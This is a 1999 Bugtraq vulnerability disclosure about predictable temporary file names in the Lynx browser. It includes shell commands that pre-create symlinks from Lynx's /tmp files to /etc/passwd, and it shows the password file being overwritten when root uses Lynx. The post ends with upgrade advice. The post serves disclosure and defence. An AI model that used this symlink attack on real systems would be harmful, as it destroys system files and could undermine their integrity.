[9470] in bugtraq
Lynx /tmp problem
daemon@ATHENA.MIT.EDU (Juan Diego Bolanos)
Thu Feb 11 13:23:02 1999
Date: Tue, 9 Feb 1999 20:57:30 -0500
Reply-To: Juan Diego Bolanos <diego@HERCULES.UNIVALLE.EDU.CO>
From: Juan Diego Bolanos <diego@HERCULES.UNIVALLE.EDU.CO>
To: BUGTRAQ@NETSPACE.ORG
Hi Aleph,
please filter this if already posted....
------
Hello....
I have found a bug in Lynx all versions, except the latest stable
release...
lynx create temporary files in /tmp in this way....
L[num proc]-xTMP.html
where
[num proc] is the proc number in the machine
x is a number from 0 to 9
if i run lynx like any user, for example root we see this
earthworm:~$ ps
PID TTY STAT TIME COMMAND
91 1 SW 0:06 (bash)
94 4 S 0:05 -bash
95 5 SW 0:06 (bash)
3867 a3 S 0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
3870 3 SW 0:02 (ssh)
3894 4 T 0:00 lynx
3898 4 R 0:00 ps
then the files in /tmp created by lynx will be..
L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html
if i make a symlink
from all of this files to any file in the system, for example....
earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html
and now root (in this example) try to download a file, or press the
backspace key to reach the history list, the file i have linked (in this
case /etc/passwd) will be replaced with it... and now is owned by root...
for example i got this in my system...
earthworm:/tmp$ cat /etc/passwd
<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
<em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>
like you see, the file is lost now...
this bug is lynx specific, so all OS are vulnerables..
Fix, upgrade to the latest lynx version, i have checked it, and it appear
to use a L[proc num]-xTMP.html where x is from 0 to ???...
i hope it is already fixed, creating 100 symlinks are not to hard :)
the lynx team know this yet.
by...
Juan Diego
